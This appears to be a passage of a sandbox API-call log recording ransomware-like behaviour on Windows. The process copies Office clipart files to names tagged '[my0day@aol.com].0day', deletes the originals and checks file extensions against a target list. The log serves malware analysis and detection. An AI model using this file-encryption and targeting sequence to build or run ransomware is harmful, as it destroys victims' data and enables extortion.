[0274.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.703] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.703] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0274.704] GetLastError () returned 0x0 [0274.704] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x70c, lpOverlapped=0x0) returned 1 [0274.705] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x710, lpOverlapped=0x0) returned 1 [0274.706] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.706] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.707] SetEndOfFile (hFile=0x388) returned 1 [0274.707] CloseHandle (hObject=0x388) returned 1 [0274.707] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.707] SetEndOfFile (hFile=0x39c) returned 1 [0274.709] CloseHandle (hObject=0x39c) returned 1 [0274.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.710] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf")) returned 1 [0274.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.710] lstrlenW (lpString=".doc") returned 4 [0274.710] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.710] lstrlenW (lpString=".docx") returned 5 [0274.710] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.710] lstrlenW (lpString=".pdf") returned 4 [0274.710] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.710] lstrlenW (lpString=".xls") returned 4 [0274.710] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.710] lstrlenW (lpString=".xlsx") returned 5 [0274.710] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.710] lstrlenW (lpString=".ppt") returned 4 [0274.710] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.710] lstrlenW (lpString=".zip") returned 4 [0274.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.710] lstrlenW (lpString=".rar") returned 4 [0274.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.710] lstrlenW (lpString=".bz2") returned 4 [0274.710] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.710] lstrlenW (lpString=".7z") returned 3 [0274.710] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.711] lstrlenW (lpString=".dbf") returned 4 [0274.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.711] lstrlenW (lpString=".1cd") returned 4 [0274.711] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.711] lstrlenW (lpString=".jpg") returned 4 [0274.711] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.711] lstrlenW (lpString=".doc") returned 4 [0274.711] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.711] lstrlenW (lpString=".docx") returned 5 [0274.711] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.711] lstrlenW (lpString=".pdf") returned 4 [0274.711] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.711] lstrlenW (lpString=".xls") returned 4 [0274.711] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.711] lstrlenW (lpString=".xlsx") returned 5 [0274.711] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.711] lstrlenW (lpString=".ppt") returned 4 [0274.711] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.711] lstrlenW (lpString=".zip") returned 4 [0274.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.711] lstrlenW (lpString=".rar") returned 4 [0274.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.711] lstrlenW (lpString=".bz2") returned 4 [0274.711] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.711] lstrlenW (lpString=".7z") returned 3 [0274.711] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.712] lstrlenW (lpString=".dbf") returned 4 [0274.712] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.712] lstrlenW (lpString=".1cd") returned 4 [0274.712] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0274.712] lstrlenW (lpString=".jpg") returned 4 [0274.712] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.712] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.712] lstrlenW (lpString="DD01179_.WMF") returned 12 [0274.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.712] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2024) returned 1 [0274.712] CloseHandle (hObject=0x39c) returned 1 [0274.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf")) returned 0x20 [0274.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.713] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.713] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0274.713] GetLastError () returned 0x0 [0274.713] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x7e8, lpOverlapped=0x0) returned 1 [0274.715] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0274.716] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.716] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.716] SetEndOfFile (hFile=0x388) returned 1 [0274.716] CloseHandle (hObject=0x388) returned 1 [0274.716] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.716] SetEndOfFile (hFile=0x39c) returned 1 [0274.718] CloseHandle (hObject=0x39c) returned 1 [0274.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf")) returned 1 [0274.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.719] lstrlenW (lpString=".doc") returned 4 [0274.719] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.719] lstrlenW (lpString=".docx") returned 5 [0274.719] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.720] lstrlenW (lpString=".pdf") returned 4 [0274.720] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.720] lstrlenW (lpString=".xls") returned 4 [0274.720] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.720] lstrlenW (lpString=".xlsx") returned 5 [0274.720] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.720] lstrlenW (lpString=".ppt") returned 4 [0274.720] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.720] lstrlenW (lpString=".zip") returned 4 [0274.720] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.720] lstrlenW (lpString=".rar") returned 4 [0274.720] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.720] lstrlenW (lpString=".bz2") returned 4 [0274.720] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.720] lstrlenW (lpString=".7z") returned 3 [0274.720] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.720] lstrlenW (lpString=".dbf") returned 4 [0274.720] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.720] lstrlenW (lpString=".1cd") returned 4 [0274.720] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.720] lstrlenW (lpString=".jpg") returned 4 [0274.720] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.720] lstrlenW (lpString=".doc") returned 4 [0274.720] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.720] lstrlenW (lpString=".docx") returned 5 [0274.720] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.720] lstrlenW (lpString=".pdf") returned 4 [0274.720] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.721] lstrlenW (lpString=".xls") returned 4 [0274.721] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.721] lstrlenW (lpString=".xlsx") returned 5 [0274.721] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.721] lstrlenW (lpString=".ppt") returned 4 [0274.721] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.721] lstrlenW (lpString=".zip") returned 4 [0274.721] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.721] lstrlenW (lpString=".rar") returned 4 [0274.721] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.721] lstrlenW (lpString=".bz2") returned 4 [0274.721] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.721] lstrlenW (lpString=".7z") returned 3 [0274.721] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.721] lstrlenW (lpString=".dbf") returned 4 [0274.721] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.721] lstrlenW (lpString=".1cd") returned 4 [0274.721] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0274.721] lstrlenW (lpString=".jpg") returned 4 [0274.721] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.721] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.721] lstrlenW (lpString="DD01180_.WMF") returned 12 [0274.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.722] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2084) returned 1 [0274.722] CloseHandle (hObject=0x39c) returned 1 [0274.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf")) returned 0x20 [0274.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.722] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.722] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0274.722] GetLastError () returned 0x0 [0274.722] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x824, lpOverlapped=0x0) returned 1 [0274.724] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x830, lpOverlapped=0x0) returned 1 [0274.725] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.725] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.725] SetEndOfFile (hFile=0x388) returned 1 [0274.725] CloseHandle (hObject=0x388) returned 1 [0274.725] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.725] SetEndOfFile (hFile=0x39c) returned 1 [0274.727] CloseHandle (hObject=0x39c) returned 1 [0274.727] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.728] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf")) returned 1 [0274.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.728] lstrlenW (lpString=".doc") returned 4 [0274.728] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.728] lstrlenW (lpString=".docx") returned 5 [0274.728] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.728] lstrlenW (lpString=".pdf") returned 4 [0274.728] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.728] lstrlenW (lpString=".xls") returned 4 [0274.728] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.728] lstrlenW (lpString=".xlsx") returned 5 [0274.728] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.728] lstrlenW (lpString=".ppt") returned 4 [0274.728] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.728] lstrlenW (lpString=".zip") returned 4 [0274.728] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.728] lstrlenW (lpString=".rar") returned 4 [0274.728] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.728] lstrlenW (lpString=".bz2") returned 4 [0274.728] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.728] lstrlenW (lpString=".7z") returned 3 [0274.728] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.728] lstrlenW (lpString=".dbf") returned 4 [0274.728] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.729] lstrlenW (lpString=".1cd") returned 4 [0274.729] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.729] lstrlenW (lpString=".jpg") returned 4 [0274.729] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.729] lstrlenW (lpString=".doc") returned 4 [0274.729] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString=".docx") returned 5 [0274.729] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.729] lstrlenW (lpString=".pdf") returned 4 [0274.729] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString=".xls") returned 4 [0274.729] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.729] lstrlenW (lpString=".xlsx") returned 5 [0274.729] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.729] lstrlenW (lpString=".ppt") returned 4 [0274.729] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.729] lstrlenW (lpString=".zip") returned 4 [0274.729] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.729] lstrlenW (lpString=".rar") returned 4 [0274.729] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString=".bz2") returned 4 [0274.729] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString=".7z") returned 3 [0274.729] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.729] lstrlenW (lpString=".dbf") returned 4 [0274.729] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.729] lstrlenW (lpString=".1cd") returned 4 [0274.730] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0274.730] lstrlenW (lpString=".jpg") returned 4 [0274.730] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.730] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.730] lstrlenW (lpString="DD01181_.WMF") returned 12 [0274.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.731] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1448) returned 1 [0274.731] CloseHandle (hObject=0x39c) returned 1 [0274.731] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf")) returned 0x20 [0274.731] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.731] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.731] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 